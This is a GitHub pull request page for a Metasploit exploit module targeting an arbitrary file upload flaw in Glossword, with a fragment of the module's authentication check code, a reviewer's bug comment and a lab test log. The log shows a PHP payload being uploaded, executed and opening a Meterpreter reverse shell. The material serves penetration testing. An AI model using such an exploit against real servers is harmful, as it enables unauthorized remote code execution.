Add Glossword Arbitrary File Upload Vulnerability exploit #1515

Merged
merged 2 commits into from Feb 25, 2013

Projects

None yet

3 participants

@bcoles
Contributor
bcoles commented Feb 24, 2013

Add Glossword Arbitrary File Upload Vulnerability exploit module.

@brandonprry brandonprry and 1 other commented on an outdated diff Feb 24, 2013
modules/exploits/multi/http/glossword_upload_exec.rb
+ def check
+
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+ peer = "#{rhost}:#{rport}"
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+
+ # login
+ print_status("#{peer} - Authenticating as user '#{user}'")
+ begin
+ res = login(base, user, pass)
+ if res and res.code == 200
+ print_error("#{peer} - Authentication failed")
+ return Exploit::CheckCode::Unknown
+ elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/
@brandonprry
brandonprry Feb 24, 2013 Contributor

I think there is a bug here. If res is nil, it will fall into this elsif and throw a nil exception when trying to access code.

@bcoles
bcoles Feb 25, 2013 Contributor

Good call. Fixed in commit d7c0ce4.

@wchen-r7
Contributor

Tested:

msf  exploit(glossword_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.83:4444 
[!] TEST
[*] 192.168.1.72:80 - Authenticating as user 'admin'
[+] 192.168.1.72:80 - Authenticated successfully
[*] 192.168.1.72:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.72:80 - File uploaded successfully
[*] 192.168.1.72:80 - Locating PHP payload file
[+] 192.168.1.72:80 - Found payload file path (gw_temp/a/1361816417_GaNRpGDXFH.php)
[*] 192.168.1.72:80 - Executing payload (gw_temp/a/1361816417_GaNRpGDXFH.php)
[*] Sending stage (39217 bytes) to 192.168.1.72
[*] Meterpreter session 3 opened (192.168.1.83:4444 -> 192.168.1.72:45520) at 2013-02-25 12:20:17 -0600
@wchen-r7 wchen-r7 merged commit d7c0ce4 into rapid7:master Feb 25, 2013

1 check passed

default The Travis build passed
Details
@bcoles bcoles deleted the bcoles:glossword_upload_exec branch Feb 26, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment